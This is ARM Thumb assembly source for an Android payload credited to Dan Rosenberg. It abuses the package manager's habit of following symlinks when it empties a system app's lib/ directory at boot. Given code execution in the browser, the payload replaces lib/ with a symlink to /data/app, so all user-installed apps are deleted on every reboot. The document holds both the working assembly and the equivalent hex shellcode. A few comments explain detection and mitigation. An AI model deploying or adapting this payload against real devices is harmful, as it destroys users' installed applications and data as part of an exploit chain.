/*
* Android Arbitrary File Removal Payload
* by Dan Rosenberg (@djrbliss)
*
* Android differentiates between "system" applications and user-installed
* applications, where the former are OEM-shipped and installed in /system/app
* rather than /data/app (this has nothing to do with the privileges with which
* these applications run). On boot, the Android package manager does a sanity
* check on system apps to ensure their native library directories, in
* /data/data/[app]/lib, are empty, and if not, empties them by unlinking
* everything inside. This check will happily follow symbolic links, so if you
* can run code in the context of a system application (such as the browser),
* you can replace its lib/ directory with a symlink to a target directory,
* which will be (non-recursively) emptied on every subsequent reboot until the
* symlink is removed. Of course this will only remove files on filesystems
* mounted read-write (usually not /system).
*
* I expect this will be useful for APT attackers who have Webkit exploits, are
* really bored, and want to play pranks on their victims. :p
*
* This ARM payload removes all user-installed applications on reboot, freeing
* you from the shackles of your Twitter addiction. This example must be run
* in the context of the Android browser.
*
* char payload[] = "\x04\xa0\x28\x27\x00\xdf\x0c\xa0\x02\xa1\x53\x27\x00"
* "\xdf\x01\x27\x00\xdf\xc0\x46\x2f\x64\x61\x74\x61\x2f"
* "\x64\x61\x74\x61\x2f\x63\x6f\x6d\x2e\x61\x6e\x64\x72"
* "\x6f\x69\x64\x2e\x62\x72\x6f\x77\x73\x65\x72\x2f\x6c"
* "\x69\x62\x00\x00\x2f\x64\x61\x74\x61\x2f\x61\x70\x70"
* "\x00\xc0\x46";
*/
/* Linux ARM EABI syscall numbers. Convention used below: r7 = number,
 * arguments in r0/r1, trap with swi #0 (the pre-UAL spelling of svc #0),
 * result back in r0 (negative value = -errno). */
.equ NR_exit, 1
.equ NR_rmdir, 40
.equ NR_symlink, 83
.thumb                          @ 16-bit Thumb encoding; this is what the hex string in the header encodes
.text
/*
 * start: payload entry point. Issues three syscalls in order and never returns:
 *   rmdir(.Llib) -> symlink(.Lapps, .Llib) -> exit(r0)
 *
 * Registers: r0/r1 = syscall arguments, r7 = syscall number. Nothing else is
 * touched and no stack is used.
 *
 * No return value is ever checked: if rmdir fails (lib/ not empty, wrong path,
 * no permission) the symlink step fails too and the process simply exits.
 * rmdir only removes an empty directory, so this relies on lib/ being empty.
 *
 * The durable artifact is lib/ becoming a symlink to /data/app. The package
 * manager behaviour described in the header (following that symlink when it
 * empties lib/) is what turns this into deletion on every reboot; a check that
 * lstat()s lib/ and refuses a symlink there neutralises it, and a symlinked
 * lib/ under a system app's data directory is the thing to look for on a device.
 *
 * Thumb adr needs a word-aligned target, hence the .align before each string;
 * the padding shows up as filler bytes in the header's hex dump.
 */
start:
.Lrmdir:
adr r0, .Llib                   @ r0 = "/data/data/com.android.browser/lib"
mov r7, #NR_rmdir
swi #0                          @ rmdir(r0); succeeds only if lib/ is already empty
.Lsymlink:
adr r0, .Lapps                  @ r0 = target   "/data/app"
adr r1, .Llib                   @ r1 = linkpath: the lib/ directory just removed
mov r7, #NR_symlink
swi #0                          @ symlink(r0, r1); lib/ now points at /data/app
.Lexit:
mov r7, #NR_exit
swi #0                          @ exit(r0); r0 is whatever symlink() returned (0 or -errno)
.align                          @ word-align the string for the Thumb adr above
.Llib:
.asciz "/data/data/com.android.browser/lib"
.align
.Lapps:
.asciz "/data/app"
.end